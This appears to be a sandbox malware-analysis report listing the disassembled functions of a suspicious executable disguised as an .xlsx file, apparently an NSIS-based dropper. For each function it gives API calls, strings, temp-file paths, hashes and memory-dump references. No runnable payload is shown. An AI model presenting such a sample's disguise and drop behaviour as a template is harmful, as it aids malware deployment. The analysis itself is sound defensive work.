Opcode ID: f32dd1ad4cacf5c9a84244efbfcf101a6acffad7926e6f22680bdd12f93664ba
Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
Opcode Fuzzy Hash: f32dd1ad4cacf5c9a84244efbfcf101a6acffad7926e6f22680bdd12f93664ba
Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58

Function 00404635 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 265stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404684
SetWindowTextW.USER32(00000000,?), ref: 004046AE
SHBrowseForFolderW.SHELL32(?), ref: 0040475F
CoTaskMemFree.OLE32(00000000), ref: 0040476A
lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
lstrcatW.KERNEL32(?,Call), ref: 004047A8
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA

Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B

Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266

GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F

Strings

Call, xrefs: 00404796, 0040479B, 004047A6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 00404785
4Ct, xrefs: 0040463B
&B, xrefs: 00404732
A, xrefs: 00404758

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: 4Ct$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
API String ID: 2246997448-1868779187
Opcode ID: 412048f63ccbd6e0220628bf1a6179061b89ed4b5b9cf72557f1d92d188b8240
Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
Opcode Fuzzy Hash: 412048f63ccbd6e0220628bf1a6179061b89ed4b5b9cf72557f1d92d188b8240
Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69

Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A

Function 00404337 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
GetDlgItem.USER32(?,?), ref: 004043E9
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
GetSysColor.USER32(?), ref: 00404417
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
lstrlenW.KERNEL32(?), ref: 00404438
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
GetDlgItem.USER32(?,0000040A), ref: 004044B3
SendMessageW.USER32(00000000), ref: 004044BA
GetDlgItem.USER32(?,?), ref: 004044E5
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
LoadCursorW.USER32(00000000,00007F02), ref: 00404536
SetCursor.USER32(00000000), ref: 00404539
ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
SetCursor.USER32(00000000), ref: 0040455D
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
SendMessageW.USER32(?,00000000,00000000), ref: 0040459E

Strings

N, xrefs: 004044D3
Call, xrefs: 00404514
open, xrefs: 00404546
4Ct, xrefs: 00404493

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: 4Ct$Call$N$open
API String ID: 3615053054-1055102945
Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99

Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3

Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B

GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
wsprintfA.USER32 ref: 00405CDE
GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
GlobalFree.KERNEL32(00000000), ref: 00405DCF
CloseHandle.KERNEL32(00000000), ref: 00405DD6

Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

Strings

NUL, xrefs: 00405C70
[Rename], xrefs: 00405D48, 00405D5A
%ls=%ls, xrefs: 00405CD4

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 1265525490-899692902
Opcode ID: 2bc208171b49c92f6a46eb4eb130c3b065c9cc931763dc7ff993c44723f9a4f8
Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
Opcode Fuzzy Hash: 2bc208171b49c92f6a46eb4eb130c3b065c9cc931763dc7ff993c44723f9a4f8
Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5

Function 004061DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
CharNextW.USER32(?,?,?,00000000), ref: 0040624E
CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266

Strings

"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", xrefs: 00406220
*?|<>/":, xrefs: 0040622E
C:\Users\user\AppData\Local\Temp\, xrefs: 004061DD, 004061E2

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4098824426
Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD

Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,?,?,00000021), ref: 0040252F
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,?,?,00000021), ref: 00402536
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568

Strings

C:\Users\user\AppData\Local\Temp\nseDB62.tmp, xrefs: 00402528
8, xrefs: 0040250C
C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll, xrefs: 004024FA, 0040251B, 00402525, 00402535, 0040255C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Local\Temp\nseDB62.tmp$C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll
API String ID: 1453599865-3348084196
Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D

Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040421E
GetSysColor.USER32(00000000), ref: 0040423A
SetTextColor.GDI32(?,00000000), ref: 00404246
SetBkMode.GDI32(?,?), ref: 00404252
GetSysColor.USER32(?), ref: 00404265
SetBkColor.GDI32(?,?), ref: 00404275
DeleteObject.GDI32(?), ref: 0040428F
CreateBrushIndirect.GDI32(?), ref: 00404299

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65

Function 004027E5 Relevance: 10.6, APIs: 7, Instructions: 75memoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

GlobalAlloc.KERNEL32(?,?), ref: 00402809
CloseHandle.KERNEL32(?), ref: 0040288F

Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D

GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
GlobalFree.KERNEL32(?), ref: 0040285E
WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
GlobalFree.KERNEL32(00000000), ref: 00402877

Part of subcall function 00403062: SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
Part of subcall function 00403062: WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115

DeleteFileW.KERNEL32(?), ref: 004028A3

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
String ID:
API String ID: 64603807-0
Opcode ID: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
Instruction ID: 618f9bc0fb3bf7a155370674c03f3081ddbeebb813ad2def4b435a70289f4265
Opcode Fuzzy Hash: 0ae5610b60e6d4e17f9dac3ea963c7d8fcfadd954a58792ee9e4497ece00f648
Instruction Fuzzy Hash: D4215C72C00118BFDF11AFA4CD89CAE7E79EF08364B14463AF5147A2E0C6795E419BA9

Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D35
GetTickCount.KERNEL32 ref: 00402D53
wsprintfW.USER32 ref: 00402D81

Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
ShowWindow.USER32(00000000,00000005), ref: 00402DB3

Part of subcall function 00402CFE: MulDiv.KERNEL32(0001E4F1,?,00023D98), ref: 00402D13

Strings

... %d%%, xrefs: 00402D7B

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
